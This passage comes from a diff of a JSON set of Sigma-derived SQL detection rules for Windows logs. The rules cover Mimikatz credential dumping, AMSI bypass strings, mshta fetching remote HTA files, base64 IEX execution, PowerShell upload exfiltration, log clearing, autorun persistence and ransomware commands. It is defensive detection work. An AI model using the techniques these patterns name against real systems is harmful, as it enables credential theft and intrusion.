('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' 
ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_python_adidnsdump.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE 
'%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": 
"proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "author": "frack113", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the 
remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "description": "Download or Copy file with Extrac32", "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1071.001" + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" - }, - { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": 
"Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "author": "frack113", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": 
"proc_creation_win_remote_access_tools_rurat_non_default_location.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN 
('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": 
"proc_creation_win_hktl_localpotato.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "status": "experimental", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + 
"status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative script" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious PowerShell 
Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' 
ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Unknown" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM 
logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Data Compressed - PowerShell", - "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "status": "test", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - 